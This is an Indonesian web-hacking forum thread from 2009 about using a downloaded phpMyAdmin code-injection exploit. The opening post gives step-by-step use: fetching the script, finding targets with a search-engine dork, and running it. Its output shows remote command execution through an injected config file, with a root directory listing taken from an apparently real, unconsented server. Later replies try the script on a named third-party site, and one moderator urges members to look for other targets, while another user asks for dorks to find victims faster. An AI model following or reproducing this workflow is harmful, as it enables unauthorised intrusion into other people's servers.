phpMyAdmin injection code

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
wishnusakti
Posts: 3
Joined: Fri Sep 14, 2007 2:19 pm
Location: surabaya

phpMyAdmin injection code

Post by wishnusakti » Sun Jun 14, 2009 10:30 am

jumpa lagi nih... jangan bosen ya... disini aku mau kasih PoC phpMyAdmin injection code, dan udah berhasil sih hehehe :D. ok deh langsung aja :

1. Download exploit nya di milw0rm

Code: Select all

http://milw0rm.com/exploits/download/8921
2. setelah di download ubah permission file yang dengan cara :

Code: Select all

chmod 755 nama_file.sh
3. kalo kamu pake linux kamu harus install curl caranya :

Code: Select all

sudo apt-get install curl
4. googling :

Code: Select all

inurl:phpmyadmin
5. contoh nya :

Code: Select all

wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://*********.*****.**//config/config.inc.php?c=ls+-l+/
    http://***************//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
dan hasilnya :

Code: Select all

total 112
drwxr-xr-x   2 root root  4096 Mar 11 06:47 bin
drwxr-xr-x   3 root root  4096 Apr 16 07:24 boot
lrwxrwxrwx   1 root root    11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13840 May 31 08:21 dev
drwxr-xr-x  96 root root  4096 Jun 11 06:44 etc
drwxr-xr-x   5 root root  4096 May  4 13:49 home
lrwxrwxrwx   1 root root    32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx   1 root root    31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x  13 root root 12288 Apr 16 07:23 lib
drwx------   2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x   3 root root  4096 Feb 19 20:07 media
drwxr-xr-x  14 root root  4096 May 18 22:39 mnt
drwxr-xr-x   2 root root  4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root     0 May 31 08:21 proc
drwxr-xr-x   9 root root  4096 May 19 14:47 root
drwxr-xr-x   2 root root  4096 Apr 16 07:23 sbin
-rw-------   1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x   2 root root  4096 Feb 19 20:08 srv
drwxr-xr-x  12 root root     0 May 31 08:21 sys
drwxrwxrwt   5 root root  4096 Jun 14 05:32 tmp
drwxr-xr-x  11 root root  4096 Feb 19 20:14 usr
drwxr-xr-x  15 root root  4096 Feb 19 20:26 var
lrwxrwxrwx   1 root root    29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx   1 root root    28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server
ok dehhh sekian dulu ya :D

thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain :D
salam PsyChotr0n
Image

User avatar
agent_of_change
Posts: 22
Joined: Sat Feb 28, 2009 8:08 pm

Re: phpMyAdmin injection code

Post by agent_of_change » Thu Jun 18, 2009 7:08 am

bro ...
jelasin yang tahap kelima dunk

User avatar
Agoes_doubleb
Posts: 17
Joined: Thu Jun 18, 2009 12:47 pm
Contact:

Re: phpMyAdmin injection code

Post by Agoes_doubleb » Thu Jun 18, 2009 12:54 pm

Mantap2.. tapi namaku ga ada.... :lol:

User avatar
Santet
Posts: 46
Joined: Sat Mar 28, 2009 7:09 pm
Contact:

Re: phpMyAdmin injection code

Post by Santet » Thu Jun 18, 2009 2:31 pm

bro setelah saya download http://milw0rm.com/exploits/download/8921
terus saya buka dengan notepad kok hasilnya kosong
apa harus pakek software khusus kah??

User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:

Re: phpMyAdmin injection code

Post by Xshadow » Thu Jun 18, 2009 8:38 pm

untuk point nomer 5
itu dijalankan di konsole linux

@atas
isinya kosong mungkin kena antivirus kamu...
coba pakai linux aja bos :)
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

User avatar
agent_of_change
Posts: 22
Joined: Sat Feb 28, 2009 8:08 pm

Re: phpMyAdmin injection code

Post by agent_of_change » Fri Jun 19, 2009 7:33 am

udah ku cuba...
setelah dapat korban..
keluar tulisan

yudi@yudi-laptop:~/Desktop$ ./8921.sh http://indraoct.freevar.com/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?
terus gmana?

User avatar
Santet
Posts: 46
Joined: Sat Mar 28, 2009 7:09 pm
Contact:

Re: phpMyAdmin injection code

Post by Santet » Fri Jun 19, 2009 2:06 pm

iya disini terdeksi av nya linux apa geto
tpi kompi saya buat kerja
dan ini bkn kompi sendiri
ada cara laen yang bwt windows gk??
please :(

User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:

Re: phpMyAdmin injection code

Post by Xshadow » Fri Jun 19, 2009 5:42 pm

agent_of_change wrote:udah ku cuba...
setelah dapat korban..
keluar tulisan

yudi@yudi-laptop:~/Desktop$ ./8921.sh http://indraoct.freevar.com/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?
terus gmana?
berarti tidak diperbolehkan masuk phpmyadmin secara langsung :)
harus lewat cpanel dulu...
try and error trus bro :)
cari target lain :D
jangan terpaku 1 target :)
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: phpMyAdmin injection code

Post by N4ck0 » Fri Jun 19, 2009 7:41 pm

PHPmyadmin yahh
nice share om

izin nyoba

User avatar
agent_of_change
Posts: 22
Joined: Sat Feb 28, 2009 8:08 pm

Re: phpMyAdmin injection code

Post by agent_of_change » Sat Jun 20, 2009 9:48 pm

Xshadow wrote:
berarti tidak diperbolehkan masuk phpmyadmin secara langsung :)
harus lewat cpanel dulu...
try and error trus bro :)
cari target lain :D
jangan terpaku 1 target :)
ada dork nya ga?
biar cepet dapet korban

Post Reply

Return to “Web Hacking”